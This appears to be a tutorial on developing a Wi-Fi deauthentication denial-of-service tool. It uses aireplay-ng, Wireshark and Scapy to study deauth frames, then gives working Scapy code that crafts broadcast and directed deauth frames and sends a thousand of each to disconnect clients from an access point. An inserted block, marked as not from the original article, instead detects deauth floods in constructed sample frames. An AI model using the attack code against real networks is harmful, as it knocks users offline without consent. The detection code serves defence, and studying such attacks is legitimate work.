In this article I will walk through the process of developing an attack tool. As an example, we will develop a wireless network DoS tool. We will follow these steps:
- How does it work?
- Run attack tool for sample packets
- Capture traffic with Wireshark for analysis
- Export specific packets with Wireshark for detailed analysis
- Import the exported packets into the Scapy console for analysis
- Analyze the packets for detailed information
- Craft a packet with Scapy
- Send packets to target
How does it work?
First we have to answer this question, because if you do not know how a system works, you cannot develop an attack or a defense. For this example, we should answer the following question:
- How is a client's connection to the access point broken?
Answer: The main problem here is deauthentication packets.
Run attack tool for sample packets (Reverse Engineering)
For this reason, we will need these packets. This step is actually a reverse engineering step. In this step, we will run aireplay-ng.
We need two types of packet for this process:
- Broadcast deauthentication packets
- Not broadcast
Capture traffic with Wireshark for analysis || Exporting specific packets
After running the aireplay-ng tool, we capture sample packets with Wireshark. After capturing the packets, we export the sample packets from the main menu of Wireshark by following the path File -> Export Specific Packet.
Import exported specific packets to scapy console for analysis
In the Scapy shell, we import the exported files for analysis with the rdpcap function.
Detailed information for deauthentication packets (Layers)
~ Broadcast
addr1 = Destination, addr2 = Source, addr3 = Source, addr4 = None
~ Not broadcast
addr1 = Destination, addr2 = Source, addr3 = Destination, addr4 = None
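The address layouts above are also what a monitoring sensor can key on. As an added example (not code from the original article), this Python sketch parses raw 802.11 frames with the radiotap header already stripped, classifies deauthentication frames as broadcast or directed, and flags senders that exceed a rate threshold. The MAC addresses, sample frames, threshold and window are constructed assumptions.

```python
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(frame):
    """Parse an 802.11 frame (radiotap already stripped); None if not a deauth."""
    if len(frame) < 26:                  # 24-byte management header + 2-byte reason
        return None
    (fc,) = struct.unpack_from("<H", frame, 0)
    if (fc >> 2) & 0x3 != 0 or (fc >> 4) & 0xF != 12:   # type 0 (mgmt), subtype 12
        return None
    addr1, addr2, addr3 = (mac(frame[o:o + 6]) for o in (4, 10, 16))
    (reason,) = struct.unpack_from("<H", frame, 24)
    kind = "broadcast" if addr1 == BROADCAST else "directed"
    return {"addr1": addr1, "addr2": addr2, "addr3": addr3, "reason": reason, "kind": kind}

def detect_floods(events, threshold=10, window=5.0):
    """Flag (addr2, addr1) pairs with >= threshold deauths inside window seconds.
    events: (timestamp, raw_frame) in time order; defaults are assumed tuning values."""
    recent, alerts = defaultdict(deque), {}
    for ts, raw in events:
        d = parse_deauth(raw)
        if d is None:
            continue
        q = recent[(d["addr2"], d["addr1"])]
        q.append(ts)
        while ts - q[0] > window:        # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alerts.setdefault((d["addr2"], d["addr1"]), d["kind"])
    return alerts

# Constructed sample capture: made-up MACs, frames built as bytes only for testing.
def sample_frame(subtype, a1, a2, a3, reason=7):
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return (struct.pack("<HH", subtype << 4, 0) + raw(a1) + raw(a2) + raw(a3)
            + struct.pack("<HH", 0, reason))
AP, STA, OTHER_AP = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:03"
SAMPLE = sorted(
    [(i * 0.2, sample_frame(12, BROADCAST, AP, AP)) for i in range(30)]    # broadcast flood
    + [(i * 0.2, sample_frame(12, AP, STA, AP)) for i in range(30)]        # directed flood
    + [(3.0, sample_frame(12, STA, OTHER_AP, OTHER_AP, reason=3))]         # single deauth
    + [(i * 0.1, sample_frame(8, BROADCAST, AP, AP)) for i in range(50)],  # beacons, ignored
    key=lambda e: e[0])
for (src, dst), kind in detect_floods(SAMPLE).items():
    print(f"deauth flood ({kind}): {src} -> {dst}")
```

Because addr2 in these frames is trivially spoofed, an alert identifies the impersonated address and the affected pair, not the transmitter.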
Craft a packet with scapy
# broad, bssid and client are MAC address strings defined elsewhere
broadcast = RadioTap() / Dot11(addr1=broad, addr2=bssid.lower(), addr3=bssid.lower()) / Dot11Deauth()
direct = RadioTap() / Dot11(addr1=bssid, addr2=client.lower(), addr3=bssid) / Dot11Deauth()
Send Packet(s) to Target(s)
Finally, we send the packets we created to the destination 🙂
# Direct
sendp(direct, iface='wlan0', count=1000, inter=.2, verbose=False)
# Broadcast
sendp(broadcast, iface='wlan0', count=1000, inter=.2, verbose=False)